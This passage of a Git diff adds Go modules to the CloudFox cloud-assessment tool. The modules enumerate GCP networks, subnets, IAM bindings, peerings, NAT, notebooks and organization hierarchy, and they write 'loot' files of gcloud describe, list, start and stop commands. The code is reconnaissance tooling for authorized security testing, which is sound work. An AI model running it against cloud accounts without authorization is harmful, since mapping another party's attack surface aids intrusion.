PeeringCount int + IsSharedVPC bool + SharedVPCRole string // "host" or "service" + SharedVPCHost string + MTU int64 + CreationTimestamp string + FirewallRuleCount int + PrivateGoogleAcces bool +} + +type Subnet struct { + Name string + ProjectID string + Network string + Region string + IPCIDRRange string + SecondaryRanges []string + PrivateIPGoogleAccess bool + FlowLogsEnabled bool + Purpose string + Role string + StackType string + IAMBindings []SubnetIAMBinding +} + +type SubnetIAMBinding struct { + Role string + Member string +} + +type VPCPeering struct { + Name string + Network string + PeerNetwork string + State string + StateDetails string + ExportCustomRoute bool + ImportCustomRoute bool + ExportSubnetRoute bool + ImportSubnetRoute bool + ProjectID string + PeerProjectID string + AutoCreateRoutes bool +} + +type SharedVPCConfig struct { + HostProject string + ServiceProjects []string + SharedSubnets []string + SharedNetworks []string +} + +type CloudNATConfig struct { + Name string + ProjectID string + Region string + Network string + Subnets []string + NATIPAddresses []string + MinPortsPerVM int64 + SourceSubnetworkType string + EnableLogging bool +} + + +type NetworkRoute struct { + Name string + ProjectID string + Network string + DestRange string + NextHop string + NextHopType string + Priority int64 + Tags []string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type NetworkTopologyModule struct { + gcpinternal.BaseGCPModule + + Networks []VPCNetwork + Subnets []Subnet + Peerings []VPCPeering + SharedVPCs map[string]*SharedVPCConfig + NATs []CloudNATConfig + Routes []NetworkRoute + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type NetworkTopologyOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o NetworkTopologyOutput) TableFiles() []internal.TableFile { return o.Table } +func (o NetworkTopologyOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPNetworkTopologyCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_NETWORKTOPOLOGY_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &NetworkTopologyModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Networks: []VPCNetwork{}, + Subnets: []Subnet{}, + Peerings: []VPCPeering{}, + SharedVPCs: make(map[string]*SharedVPCConfig), + NATs: []CloudNATConfig{}, + Routes: []NetworkRoute{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *NetworkTopologyModule) Execute(ctx context.Context, logger internal.Logger) { + // Create Compute client + computeService, err := compute.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Compute service: %v", err), GCP_NETWORKTOPOLOGY_MODULE_NAME) + return + } + + // Process each project + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, computeService, logger) + }(projectID) + } + wg.Wait() + + // Check results + if len(m.Networks) == 0 { + logger.InfoM("No VPC networks found", GCP_NETWORKTOPOLOGY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d VPC network(s), %d subnet(s), %d peering(s), %d Cloud NAT(s)", + len(m.Networks), len(m.Subnets), len(m.Peerings), len(m.NATs)), GCP_NETWORKTOPOLOGY_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *NetworkTopologyModule) processProject(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating networks for project: %s", projectID), GCP_NETWORKTOPOLOGY_MODULE_NAME) + } + + // List networks + m.enumerateNetworks(ctx, projectID, computeService, logger) + + // List subnets + m.enumerateSubnets(ctx, projectID, computeService, logger) + + // List routes + m.enumerateRoutes(ctx, projectID, computeService, logger) + + // List Cloud NAT + m.enumerateCloudNAT(ctx, projectID, computeService, logger) +} + +func (m *NetworkTopologyModule) enumerateNetworks(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Networks.List(projectID) + err := req.Pages(ctx, func(page *compute.NetworkList) error { + for _, network := range page.Items { + vpc := VPCNetwork{ + Name: network.Name, + ProjectID: projectID, + SelfLink: network.SelfLink, + Description: network.Description, + RoutingMode: network.RoutingConfig.RoutingMode, + AutoCreateSubnets: network.AutoCreateSubnetworks, + MTU: network.Mtu, + CreationTimestamp: network.CreationTimestamp, + SubnetCount: len(network.Subnetworks), + } + + // Check for peerings + for _, peering := range network.Peerings { + vpc.PeeringCount++ + + peeringRecord := VPCPeering{ + Name: peering.Name, + Network: network.SelfLink, + PeerNetwork: peering.Network, + State: peering.State, + StateDetails: peering.StateDetails, + ExportCustomRoute: peering.ExportCustomRoutes, + ImportCustomRoute: peering.ImportCustomRoutes, + ExportSubnetRoute: peering.ExportSubnetRoutesWithPublicIp, + ImportSubnetRoute: peering.ImportSubnetRoutesWithPublicIp, + ProjectID: projectID, + AutoCreateRoutes: peering.AutoCreateRoutes, + } + + // Extract peer project ID from peer network URL + peeringRecord.PeerProjectID = m.extractProjectFromURL(peering.Network) + + m.mu.Lock() + m.Peerings = append(m.Peerings, peeringRecord) + m.mu.Unlock() + } + + m.mu.Lock() + m.Networks = append(m.Networks, vpc) + m.mu.Unlock() + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list networks in project %s", projectID)) + } + + // Check for Shared VPC host project + m.checkSharedVPCHost(ctx, projectID, computeService, logger) +} + +func (m *NetworkTopologyModule) enumerateSubnets(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Subnetworks.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.SubnetworkAggregatedList) error { + for region, subnetList := range page.Items { + if subnetList.Subnetworks == nil { + continue + } + regionName := m.extractRegionFromURL(region) + for _, subnet := range subnetList.Subnetworks { + subnetRecord := Subnet{ + Name: subnet.Name, + ProjectID: projectID, + Network: subnet.Network, + Region: regionName, + IPCIDRRange: subnet.IpCidrRange, + PrivateIPGoogleAccess: subnet.PrivateIpGoogleAccess, + Purpose: subnet.Purpose, + Role: subnet.Role, + StackType: subnet.StackType, + } + + // Check for flow logs + if subnet.LogConfig != nil { + subnetRecord.FlowLogsEnabled = subnet.LogConfig.Enable + } + + // Secondary ranges + for _, sr := range subnet.SecondaryIpRanges { + subnetRecord.SecondaryRanges = append(subnetRecord.SecondaryRanges, + fmt.Sprintf("%s:%s", sr.RangeName, sr.IpCidrRange)) + } + + // Get IAM bindings for the subnet + subnetRecord.IAMBindings = m.getSubnetIAMBindings(ctx, computeService, projectID, regionName, subnet.Name) + + m.mu.Lock() + m.Subnets = append(m.Subnets, subnetRecord) + m.mu.Unlock() + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list subnets in project %s", projectID)) + } +} + +// getSubnetIAMBindings retrieves IAM bindings for a subnet +func (m *NetworkTopologyModule) getSubnetIAMBindings(ctx context.Context, computeService *compute.Service, projectID, region, subnetName string) []SubnetIAMBinding { + policy, err := computeService.Subnetworks.GetIamPolicy(projectID, region, subnetName).Context(ctx).Do() + if err != nil { + return nil + } + + var bindings []SubnetIAMBinding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + for _, member := range binding.Members { + bindings = append(bindings, SubnetIAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + return bindings +} + +func (m *NetworkTopologyModule) enumerateRoutes(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Routes.List(projectID) + err := req.Pages(ctx, func(page *compute.RouteList) error { + for _, route := range page.Items { + routeRecord := NetworkRoute{ + Name: route.Name, + ProjectID: projectID, + Network: route.Network, + DestRange: route.DestRange, + Priority: route.Priority, + Tags: route.Tags, + } + + // Determine next hop type + switch { + case route.NextHopGateway != "": + routeRecord.NextHopType = "gateway" + routeRecord.NextHop = route.NextHopGateway + case route.NextHopInstance != "": + routeRecord.NextHopType = "instance" + routeRecord.NextHop = route.NextHopInstance + case route.NextHopIp != "": + routeRecord.NextHopType = "ip" + routeRecord.NextHop = route.NextHopIp + case route.NextHopNetwork != "": + routeRecord.NextHopType = "network" + routeRecord.NextHop = route.NextHopNetwork + case route.NextHopPeering != "": + routeRecord.NextHopType = "peering" + routeRecord.NextHop = route.NextHopPeering + case route.NextHopIlb != "": + routeRecord.NextHopType = "ilb" + routeRecord.NextHop = route.NextHopIlb + case route.NextHopVpnTunnel != "": + routeRecord.NextHopType = "vpn" + routeRecord.NextHop = route.NextHopVpnTunnel + } + + m.mu.Lock() + m.Routes = append(m.Routes, routeRecord) + m.mu.Unlock() + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list routes in project %s", projectID)) + } +} + +func (m *NetworkTopologyModule) enumerateCloudNAT(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + // List routers to find NAT configurations + req := computeService.Routers.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.RouterAggregatedList) error { + for region, routerList := range page.Items { + if routerList.Routers == nil { + continue + } + for _, router := range routerList.Routers { + for _, nat := range router.Nats { + natRecord := CloudNATConfig{ + Name: nat.Name, + ProjectID: projectID, + Region: m.extractRegionFromURL(region), + Network: router.Network, + MinPortsPerVM: nat.MinPortsPerVm, + SourceSubnetworkType: nat.SourceSubnetworkIpRangesToNat, + } + + // NAT IP addresses + for _, natIP := range nat.NatIps { + natRecord.NATIPAddresses = append(natRecord.NATIPAddresses, natIP) + } + + // Subnets using this NAT + for _, subnet := range nat.Subnetworks { + natRecord.Subnets = append(natRecord.Subnets, subnet.Name) + } + + // Logging + if nat.LogConfig != nil { + natRecord.EnableLogging = nat.LogConfig.Enable + } + + m.mu.Lock() + m.NATs = append(m.NATs, natRecord) + m.mu.Unlock() + } + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list Cloud NAT in project %s", projectID)) + } +} + +func (m *NetworkTopologyModule) checkSharedVPCHost(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + // Check if project is a Shared VPC host + project, err := computeService.Projects.Get(projectID).Do() + if err != nil { + return + } + + if project.XpnProjectStatus == "HOST" { + m.mu.Lock() + m.SharedVPCs[projectID] = &SharedVPCConfig{ + HostProject: projectID, + ServiceProjects: []string{}, + SharedSubnets: []string{}, + SharedNetworks: []string{}, + } + m.mu.Unlock() + + // List service projects + xpnReq := computeService.Projects.GetXpnResources(projectID) + err := xpnReq.Pages(ctx, func(page *compute.ProjectsGetXpnResources) error { + for _, resource := range page.Resources { + if resource.Type == "PROJECT" { + m.mu.Lock() + m.SharedVPCs[projectID].ServiceProjects = append( + m.SharedVPCs[projectID].ServiceProjects, resource.Id) + m.mu.Unlock() + } + } + return nil + }) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list XPN resources in project %s", projectID)) + } + + // Mark host networks + for i := range m.Networks { + if m.Networks[i].ProjectID == projectID { + m.Networks[i].IsSharedVPC = true + m.Networks[i].SharedVPCRole = "host" + } + } + } +} + + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *NetworkTopologyModule) extractProjectFromURL(url string) string { + // Format: https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network} + if strings.Contains(url, "projects/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +func (m *NetworkTopologyModule) extractNetworkName(url string) string { + // Extract network name from full URL + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func (m *NetworkTopologyModule) extractRegionFromURL(url string) string { + // Extract region from URL like regions/us-central1 + if strings.Contains(url, "regions/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "regions" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return url +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *NetworkTopologyModule) initializeLootFiles() { + m.LootMap["network-topology-commands"] = &internal.LootFile{ + Name: "network-topology-commands", + Contents: "# Network Topology Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sort networks by project and name + sort.Slice(m.Networks, func(i, j int) bool { + if m.Networks[i].ProjectID != m.Networks[j].ProjectID { + return m.Networks[i].ProjectID < m.Networks[j].ProjectID + } + return m.Networks[i].Name < m.Networks[j].Name + }) + + // VPC Networks table + networksHeader := []string{ + "Project Name", + "Project ID", + "Network", + "Routing Mode", + "Subnets", + "Peerings", + "Shared VPC", + "MTU", + } + + var networksBody [][]string + for _, n := range m.Networks { + sharedVPC := "-" + if n.IsSharedVPC { + sharedVPC = n.SharedVPCRole + } + + networksBody = append(networksBody, []string{ + m.GetProjectName(n.ProjectID), + n.ProjectID, + n.Name, + n.RoutingMode, + fmt.Sprintf("%d", n.SubnetCount), + fmt.Sprintf("%d", n.PeeringCount), + sharedVPC, + fmt.Sprintf("%d", n.MTU), + }) + + // Add network commands to loot + m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( + "## VPC Network: %s (Project: %s)\n"+ + "# Describe network:\n"+ + "gcloud compute networks describe %s --project=%s\n\n"+ + "# List subnets in network:\n"+ + "gcloud compute networks subnets list --network=%s --project=%s\n\n"+ + "# List firewall rules for network:\n"+ + "gcloud compute firewall-rules list --filter=\"network:%s\" --project=%s\n\n", + n.Name, n.ProjectID, + n.Name, n.ProjectID, + n.Name, n.ProjectID, + n.Name, n.ProjectID, + ) + } + + // Subnets table - one row per IAM binding if present, otherwise one row per subnet + subnetsHeader := []string{ + "Project Name", + "Project ID", + "Subnet", + "Network", + "Region", + "CIDR", + "Private Google Access", + "Flow Logs", + "Purpose", + "IAM Role", + "IAM Member", + } + + var subnetsBody [][]string + for _, s := range m.Subnets { + purpose := s.Purpose + if purpose == "" { + purpose = "PRIVATE" + } + + if len(s.IAMBindings) > 0 { + // One row per IAM binding + for _, binding := range s.IAMBindings { + subnetsBody = append(subnetsBody, []string{ + m.GetProjectName(s.ProjectID), + s.ProjectID, + s.Name, + m.extractNetworkName(s.Network), + s.Region, + s.IPCIDRRange, + boolToYesNo(s.PrivateIPGoogleAccess), + boolToYesNo(s.FlowLogsEnabled), + purpose, + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row + subnetsBody = append(subnetsBody, []string{ + m.GetProjectName(s.ProjectID), + s.ProjectID, + s.Name, + m.extractNetworkName(s.Network), + s.Region, + s.IPCIDRRange, + boolToYesNo(s.PrivateIPGoogleAccess), + boolToYesNo(s.FlowLogsEnabled), + purpose, + "-", + "-", + }) + } + + // Add subnet commands to loot + m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( + "## Subnet: %s (Project: %s, Region: %s)\n"+ + "# Describe subnet:\n"+ + "gcloud compute networks subnets describe %s --region=%s --project=%s\n\n"+ + "# Get subnet IAM policy:\n"+ + "gcloud compute networks subnets get-iam-policy %s --region=%s --project=%s\n\n", + s.Name, s.ProjectID, s.Region, + s.Name, s.Region, s.ProjectID, + s.Name, s.Region, s.ProjectID, + ) + } + + // VPC Peerings table + peeringsHeader := []string{ + "Project Name", + "Project ID", + "Name", + "Local Network", + "Peer Network", + "Peer Project", + "State", + "Import Routes", + "Export Routes", + } + + var peeringsBody [][]string + for _, p := range m.Peerings { + peeringsBody = append(peeringsBody, []string{ + m.GetProjectName(p.ProjectID), + p.ProjectID, + p.Name, + m.extractNetworkName(p.Network), + m.extractNetworkName(p.PeerNetwork), + p.PeerProjectID, + p.State, + boolToYesNo(p.ImportCustomRoute), + boolToYesNo(p.ExportCustomRoute), + }) + + // Add peering commands to loot + m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( + "## VPC Peering: %s (Project: %s)\n"+ + "# Local: %s -> Peer: %s (project: %s)\n"+ + "# List peerings:\n"+ + "gcloud compute networks peerings list --project=%s\n\n"+ + "# List peering routes (incoming):\n"+ + "gcloud compute networks peerings list-routes %s --project=%s --network=%s --region=REGION --direction=INCOMING\n\n"+ + "# List peering routes (outgoing):\n"+ + "gcloud compute networks peerings list-routes %s --project=%s --network=%s --region=REGION --direction=OUTGOING\n\n", + p.Name, p.ProjectID, + m.extractNetworkName(p.Network), m.extractNetworkName(p.PeerNetwork), p.PeerProjectID, + p.ProjectID, + p.Name, p.ProjectID, m.extractNetworkName(p.Network), + p.Name, p.ProjectID, m.extractNetworkName(p.Network), + ) + } + + // Cloud NAT table + natHeader := []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "Network", + "NAT IPs", + "Logging", + } + + var natBody [][]string + for _, nat := range m.NATs { + natIPs := strings.Join(nat.NATIPAddresses, ", ") + if natIPs == "" { + natIPs = "AUTO" + } + + natBody = append(natBody, []string{ + m.GetProjectName(nat.ProjectID), + nat.ProjectID, + nat.Name, + nat.Region, + m.extractNetworkName(nat.Network), + natIPs, + boolToYesNo(nat.EnableLogging), + }) + + // Add NAT commands to loot + m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( + "## Cloud NAT: %s (Project: %s, Region: %s)\n"+ + "# Describe router with NAT config:\n"+ + "gcloud compute routers describe ROUTER_NAME --region=%s --project=%s\n\n"+ + "# List NAT mappings:\n"+ + "gcloud compute routers get-nat-mapping-info ROUTER_NAME --region=%s --project=%s\n\n", + nat.Name, nat.ProjectID, nat.Region, + nat.Region, nat.ProjectID, + nat.Region, nat.ProjectID, + ) + } + + // Add Shared VPC commands to loot + for hostProject, config := range m.SharedVPCs { + m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( + "## Shared VPC Host: %s\n"+ + "# Service Projects: %v\n"+ + "# List Shared VPC resources:\n"+ + "gcloud compute shared-vpc list-associated-resources %s\n\n"+ + "# Get host project for service project:\n"+ + "gcloud compute shared-vpc get-host-project SERVICE_PROJECT_ID\n\n"+ + "# List usable subnets for service project:\n"+ + "gcloud compute networks subnets list-usable --project=%s\n\n", + hostProject, + config.ServiceProjects, + hostProject, + hostProject, + ) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "vpc-networks", + Header: networksHeader, + Body: networksBody, + }, + } + + if len(subnetsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "subnets", + Header: subnetsHeader, + Body: subnetsBody, + }) + } + + if len(peeringsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "vpc-peerings", + Header: peeringsHeader, + Body: peeringsBody, + }) + } + + if len(natBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cloud-nat", + Header: natHeader, + Body: natBody, + }) + } + + output := NetworkTopologyOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scope names with project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_NETWORKTOPOLOGY_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/notebooks.go b/gcp/commands/notebooks.go new file mode 100644 index 00000000..4f04070a --- /dev/null +++ b/gcp/commands/notebooks.go @@ -0,0 +1,290 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + notebooksservice "github.com/BishopFox/cloudfox/gcp/services/notebooksService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPNotebooksCommand = &cobra.Command{ + Use: globals.GCP_NOTEBOOKS_MODULE_NAME, + Aliases: []string{"nb", "jupyter", "workbench"}, + Short: "Enumerate Vertex AI Workbench notebooks", + Long: `Enumerate Vertex AI Workbench and legacy notebook instances. + +Features: +- Lists all notebook instances across locations +- Shows service account configuration +- Identifies public IP exposure +- Checks for GPU attachments +- Analyzes proxy access settings`, + Run: runGCPNotebooksCommand, +} + +type NotebooksModule struct { + gcpinternal.BaseGCPModule + Instances []notebooksservice.NotebookInstanceInfo + Runtimes []notebooksservice.RuntimeInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type NotebooksOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o NotebooksOutput) TableFiles() []internal.TableFile { return o.Table } +func (o NotebooksOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPNotebooksCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_NOTEBOOKS_MODULE_NAME) + if err != nil { + return + } + + module := &NotebooksModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []notebooksservice.NotebookInstanceInfo{}, + Runtimes: []notebooksservice.RuntimeInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *NotebooksModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_NOTEBOOKS_MODULE_NAME, m.processProject) + + if len(m.Instances) == 0 && len(m.Runtimes) == 0 { + logger.InfoM("No notebook instances found", globals.GCP_NOTEBOOKS_MODULE_NAME) + return + } + + publicCount := 0 + for _, instance := range m.Instances { + if !instance.NoPublicIP { + publicCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d notebook instance(s) (%d with public IP), %d runtime(s)", + len(m.Instances), publicCount, len(m.Runtimes)), globals.GCP_NOTEBOOKS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *NotebooksModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating notebooks in project: %s", projectID), globals.GCP_NOTEBOOKS_MODULE_NAME) + } + + svc := notebooksservice.New() + + // Get instances + instances, err := svc.ListInstances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_NOTEBOOKS_MODULE_NAME, + fmt.Sprintf("Could not list notebook instances in project %s", projectID)) + } else { + m.mu.Lock() + m.Instances = append(m.Instances, instances...) + for _, instance := range instances { + m.addToLoot(instance) + } + m.mu.Unlock() + } + + // Get runtimes + runtimes, err := svc.ListRuntimes(projectID) + if err == nil { + m.mu.Lock() + m.Runtimes = append(m.Runtimes, runtimes...) + m.mu.Unlock() + } +} + +func (m *NotebooksModule) initializeLootFiles() { + m.LootMap["notebooks-commands"] = &internal.LootFile{ + Name: "notebooks-commands", + Contents: "# Notebook Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *NotebooksModule) addToLoot(instance notebooksservice.NotebookInstanceInfo) { + m.LootMap["notebooks-commands"].Contents += fmt.Sprintf( + "## Instance: %s (Project: %s, Location: %s)\n"+ + "# State: %s, Service Account: %s\n"+ + "# Public IP: %s, Proxy Access: %s\n", + instance.Name, instance.ProjectID, instance.Location, + instance.State, instance.ServiceAccount, + boolToYesNo(!instance.NoPublicIP), boolToYesNo(!instance.NoProxyAccess), + ) + + if instance.ProxyUri != "" { + m.LootMap["notebooks-commands"].Contents += fmt.Sprintf( + "# Proxy URI: %s\n", instance.ProxyUri) + } + + m.LootMap["notebooks-commands"].Contents += fmt.Sprintf( + "\n# Describe instance:\n"+ + "gcloud notebooks instances describe %s --location=%s --project=%s\n\n"+ + "# Get JupyterLab proxy URL:\n"+ + "gcloud notebooks instances describe %s --location=%s --project=%s --format='value(proxyUri)'\n\n"+ + "# Start instance (if stopped):\n"+ + "gcloud notebooks instances start %s --location=%s --project=%s\n\n"+ + "# Stop instance:\n"+ + "gcloud notebooks instances stop %s --location=%s --project=%s\n\n", + instance.Name, instance.Location, instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, + ) +} + +func (m *NotebooksModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Instances table + if len(m.Instances) > 0 { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "State", + "Machine Type", + "Service Account", + "Network", + "Subnet", + "Public IP", + "Proxy Access", + "Proxy URI", + "GPU", + "Creator", + } + var body [][]string + for _, instance := range m.Instances { + gpu := "-" + if instance.AcceleratorCount > 0 { + gpu = fmt.Sprintf("%s x%d", instance.AcceleratorType, instance.AcceleratorCount) + } + sa := instance.ServiceAccount + if sa == "" { + sa = "(default)" + } + network := instance.Network + if network == "" { + network = "-" + } + subnet := instance.Subnet + if subnet == "" { + subnet = "-" + } + proxyUri := instance.ProxyUri + if proxyUri == "" { + proxyUri = "-" + } + creator := instance.Creator + if creator == "" { + creator = "-" + } + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Location, + instance.State, + instance.MachineType, + sa, + network, + subnet, + boolToYesNo(!instance.NoPublicIP), + boolToYesNo(!instance.NoProxyAccess), + proxyUri, + gpu, + creator, + }) + } + tables = append(tables, internal.TableFile{ + Name: "notebook-instances", + Header: header, + Body: body, + }) + } + + // Runtimes table + if len(m.Runtimes) > 0 { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "State", + "Type", + "Machine Type", + "Service Account", + "Network", + "Subnet", + } + var body [][]string + for _, runtime := range m.Runtimes { + sa := runtime.ServiceAccount + if sa == "" { + sa = "-" + } + network := runtime.Network + if network == "" { + network = "-" + } + subnet := runtime.Subnet + if subnet == "" { + subnet = "-" + } + body = append(body, []string{ + m.GetProjectName(runtime.ProjectID), + runtime.ProjectID, + runtime.Name, + runtime.Location, + runtime.State, + runtime.RuntimeType, + runtime.MachineType, + sa, + network, + subnet, + }) + } + tables = append(tables, internal.TableFile{ + Name: "notebook-runtimes", + Header: header, + Body: body, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := NotebooksOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_NOTEBOOKS_MODULE_NAME) + } +} diff --git a/gcp/commands/organizations.go b/gcp/commands/organizations.go new file mode 100644 index 00000000..be3f129a --- /dev/null +++ b/gcp/commands/organizations.go @@ -0,0 +1,392 @@ +package commands + +import ( + "context" + "fmt" + "strings" + + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPOrganizationsCommand = &cobra.Command{ + Use: globals.GCP_ORGANIZATIONS_MODULE_NAME, + Aliases: []string{"org", "orgs", "hierarchy"}, + Short: "Enumerate GCP organization hierarchy", + Long: `Enumerate GCP organization, folder, and project hierarchy. + +Features: +- Lists accessible organizations +- Shows folder structure +- Maps project relationships +- Displays resource hierarchy tree +- Shows ancestry paths for projects`, + Run: runGCPOrganizationsCommand, +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type OrganizationsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Organizations []orgsservice.OrganizationInfo + Folders []orgsservice.FolderInfo + Projects []orgsservice.ProjectInfo + Ancestry [][]orgsservice.HierarchyNode + LootMap map[string]*internal.LootFile +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type OrganizationsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o OrganizationsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o OrganizationsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPOrganizationsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ORGANIZATIONS_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &OrganizationsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Organizations: []orgsservice.OrganizationInfo{}, + Folders: []orgsservice.FolderInfo{}, + Projects: []orgsservice.ProjectInfo{}, + Ancestry: 